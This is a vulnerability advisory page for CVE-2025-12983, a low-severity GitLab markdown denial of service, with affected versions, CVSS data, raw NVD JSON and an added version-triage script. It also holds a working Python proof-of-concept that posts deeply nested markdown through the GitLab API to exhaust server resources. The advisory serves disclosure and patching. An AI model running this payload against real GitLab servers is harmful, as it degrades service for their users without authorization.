Security Vulnerability Report
CVE-2025-12983 CVSS 3.5 LOW

Published: 2025-11-15 09:15:42
Last Modified: 2025-11-19 19:44:26

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated attacker to cause a denial of service condition by submitting specially crafted markdown content with nested formatting patterns.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE 16.9 <= version < 18.3.6
GitLab CE/EE 18.4 <= version < 18.4.4
GitLab CE/EE 18.5 <= version < 18.5.2
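
For triage, the three affected ranges above can be checked against an inventory of GitLab version strings. This is an added example, not part of the original page or of GitLab's code; the function names, the suffix handling and the sample inventory are assumptions made for illustration.

```python
import re

# Affected ranges from this page: start inclusive, end exclusive (the fixed release).
AFFECTED_RANGES = [
    ((16, 9, 0), (18, 3, 6)),
    ((18, 4, 0), (18, 4, 4)),
    ((18, 5, 0), (18, 5, 2)),
]
_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?(?:[-+~].*)?$")

def parse_version(text):
    """Parse '18.4.3', 'v18.4.3-ee' or '18.5.1-ce.0'; any suffix is ignored (assumption)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)

def fixed_release_for(version_text):
    """Return the fixed release as 'X.Y.Z' if the version is affected, else None."""
    version = parse_version(version_text)
    for start, fixed in AFFECTED_RANGES:
        if start <= version < fixed:
            return ".".join(map(str, fixed))
    return None

def audit(inventory):
    """Map each affected host to the action needed; unparseable versions are flagged."""
    findings = {}
    for host, version_text in inventory.items():
        try:
            fixed = fixed_release_for(version_text)
        except ValueError:
            findings[host] = "unparseable version, check manually"
        else:
            if fixed:
                findings[host] = f"upgrade to {fixed} or later"
    return findings

# Constructed inventory for illustration; host names and versions are made up.
SAMPLE_INVENTORY = {
    "gitlab-a.internal.example": "17.11.2-ee",
    "gitlab-b.internal.example": "18.4.4",
    "gitlab-c.internal.example": "v18.5.1-ce.0",
    "gitlab-d.internal.example": "nightly",
}

if __name__ == "__main__":
    print(audit(SAMPLE_INVENTORY))
```

Hosts already on a fixed release are omitted from the result, so an empty dictionary means nothing in the inventory falls inside the affected ranges.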

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-12983 PoC - GitLab Markdown Nested Formatting DoS
# This PoC generates a crafted markdown payload with nested formatting patterns
# that can cause denial of service when rendered by GitLab.

import requests
import sys


def generate_nested_markdown(depth=100):
    """
    Generate nested markdown content to trigger DoS.
    The nesting creates exponential parsing complexity.
    """
    # Create deeply nested formatting patterns
    payload = "test"
    for i in range(depth):
        payload = f"**{payload}**"

    # Wrap in various formatting combinations
    final_payload = f"""**__~~{payload}~~__**
[{payload}](https://example.com)
`{payload}`
> {payload}
- {payload}
"""
    return final_payload


def exploit_gitlab(target_url, token, issue_id):
    """
    Submit crafted markdown to GitLab issue to trigger DoS.

    Args:
        target_url: Base URL of GitLab instance
        token: GitLab personal access token
        issue_id: Target issue ID to post comment
    """
    headers = {
        "PRIVATE-TOKEN": token,
        "Content-Type": "application/json"
    }

    # Generate the malicious payload
    markdown_content = generate_nested_markdown(depth=150)

    # Post as comment to trigger markdown rendering
    comment_data = {
        "body": markdown_content
    }

    api_url = f"{target_url}/api/v4/issues/{issue_id}/notes"

    try:
        response = requests.post(api_url, json=comment_data, headers=headers)
        if response.status_code == 201:
            print("[+] Malicious markdown submitted successfully!")
            print("[*] GitLab server will consume resources parsing nested patterns")
            return True
        else:
            print(f"[-] Failed to submit: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <gitlab_url> <token> <issue_id>")
        print("Example: python3 poc.py https://gitlab.example.com glpat-xxxx 123")
        sys.exit(1)

    target = sys.argv[1]
    token = sys.argv[2]
    issue = sys.argv[3]

    exploit_gitlab(target, token, issue)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12983", "sourceIdentifier": "[email protected]", "published": "2025-11-15T09:15:41.950", "lastModified": "2025-11-19T19:44:25.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated attacker to cause a denial of service condition by submitting specially crafted markdown content with nested formatting patterns."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:L", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "16.9.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "B097C4A0-D3E7-4EE7-8533-30CE2CC51381"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.9.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "3073B463-3C6C-456E-8EC6-6E1CA4B3489C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/296257", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3419588", "source": "[email protected]", "tags": ["Permissions Required"]}]}}